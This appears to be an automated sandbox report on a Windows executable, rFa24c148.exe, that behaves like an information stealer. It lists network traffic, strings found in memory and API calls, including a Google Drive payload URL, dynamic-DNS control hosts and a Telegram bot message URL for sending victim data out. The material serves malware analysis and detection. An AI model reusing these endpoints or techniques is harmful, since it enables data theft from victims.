Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 01:03:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rFa24c148.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033601000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: rFa24c148.exe, 00000004.00000002.2993781136.00000000335FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971653916.00000000048B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6dk
Source: rFa24c148.exe, 00000004.00000003.2145457011.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971357954.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145457011.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971357954.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
Source: rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadW
Source: rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloade
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloado
Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334B8000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: rFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: rFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003362D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49787 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405160
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_004031FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 4_2_004031FF
Creates files inside the system directory
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004063CC 0_2_004063CC
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_0040499D 0_2_0040499D
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004063CC 4_2_004063CC
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0040499D 4_2_0040499D
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016A088 4_2_0016A088
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016C147 4_2_0016C147
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016D278 4_2_0016D278
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00165362 4_2_00165362
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016C468 4_2_0016C468
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00166498 4_2_00166498
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016D548 4_2_0016D548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_001676F1 4_2_001676F1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016C738 4_2_0016C738
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016E988 4_2_0016E988
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016CA08 4_2_0016CA08
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016CCD8 4_2_0016CCD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016CFAA 4_2_0016CFAA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00166FC8 4_2_00166FC8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016B0B8 4_2_0016B0B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016F974 4_2_0016F974
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_0016E97A 4_2_0016E97A
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00163E09 4_2_00163E09
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36551E80 4_2_36551E80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36559328 4_2_36559328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36558BA0 4_2_36558BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_365517A0 4_2_365517A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655FC68 4_2_3655FC68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36555028 4_2_36555028
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36552968 4_2_36552968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655E258 4_2_3655E258
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655E24A 4_2_3655E24A
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36551E70 4_2_36551E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655DE00 4_2_3655DE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655EAF8 4_2_3655EAF8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655E6B0 4_2_3655E6B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655E6A0 4_2_3655E6A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655E6AF 4_2_3655E6AF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655EF60 4_2_3655EF60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655EB08 4_2_3655EB08
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36550B30 4_2_36550B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36550B20 4_2_36550B20
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36558B91 4_2_36558B91
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655178F 4_2_3655178F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655F3B8 4_2_3655F3B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36550040 4_2_36550040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655F810 4_2_3655F810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36559C18 4_2_36559C18
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36555018 4_2_36555018
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36550006 4_2_36550006
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655F802 4_2_3655F802
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655003F 4_2_3655003F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D0F8 4_2_3655D0F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655CCA0 4_2_3655CCA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D550 4_2_3655D550
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655295B 4_2_3655295B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D540 4_2_3655D540
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36559548 4_2_36559548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655DDF1 4_2_3655DDF1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655DDFF 4_2_3655DDFF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D999 4_2_3655D999
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D9A7 4_2_3655D9A7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3655D9A8 4_2_3655D9A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746E70 4_2_36746E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36747B78 4_2_36747B78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367481D0 4_2_367481D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36748FB0 4_2_36748FB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746E72 4_2_36746E72
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744A78 4_2_36744A78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674CE78 4_2_3674CE78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674CE67 4_2_3674CE67
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36743460 4_2_36743460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674EE68 4_2_3674EE68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744A68 4_2_36744A68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674EE57 4_2_3674EE57
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36741A50 4_2_36741A50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36743450 4_2_36743450
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674345F 4_2_3674345F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36740040 4_2_36740040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36741A41 4_2_36741A41
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746030 4_2_36746030
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674BC38 4_2_3674BC38
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744620 4_2_36744620
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746022 4_2_36746022
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674DC28 4_2_3674DC28
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674BC2B 4_2_3674BC2B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744610 4_2_36744610
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36740011 4_2_36740011
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674FC18 4_2_3674FC18
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746A18 4_2_36746A18
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674DC19 4_2_3674DC19
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36743007 4_2_36743007
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36743008 4_2_36743008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674D2F7 4_2_3674D2F7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367408F0 4_2_367408F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367422F0 4_2_367422F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674F2F8 4_2_3674F2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674F2E7 4_2_3674F2E7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367408E0 4_2_367408E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744ED0 4_2_36744ED0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36744EC0 4_2_36744EC0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367472C8 4_2_367472C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C0C8 4_2_3674C0C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C0B7 4_2_3674C0B7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367438B8 4_2_367438B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E0B8 4_2_3674E0B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367472B8 4_2_367472B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E0A7 4_2_3674E0A7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36741EA8 4_2_36741EA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367438A8 4_2_367438A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36740498 4_2_36740498
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36741E98 4_2_36741E98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36746488 4_2_36746488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36740489 4_2_36740489
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36747B77 4_2_36747B77
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674F778 4_2_3674F778
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36747B69 4_2_36747B69
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742758 4_2_36742758
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C558 4_2_3674C558
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36740D48 4_2_36740D48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E548 4_2_3674E548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742748 4_2_36742748
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C548 4_2_3674C548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674A938 4_2_3674A938
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E538 4_2_3674E538
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36747720 4_2_36747720
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36747722 4_2_36747722
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36745328 4_2_36745328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674A928 4_2_3674A928
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674B318 4_2_3674B318
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674531A 4_2_3674531A
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674B307 4_2_3674B307
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742300 4_2_36742300
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674D308 4_2_3674D308
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367415F8 4_2_367415F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742FF9 4_2_36742FF9
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C9E8 4_2_3674C9E8
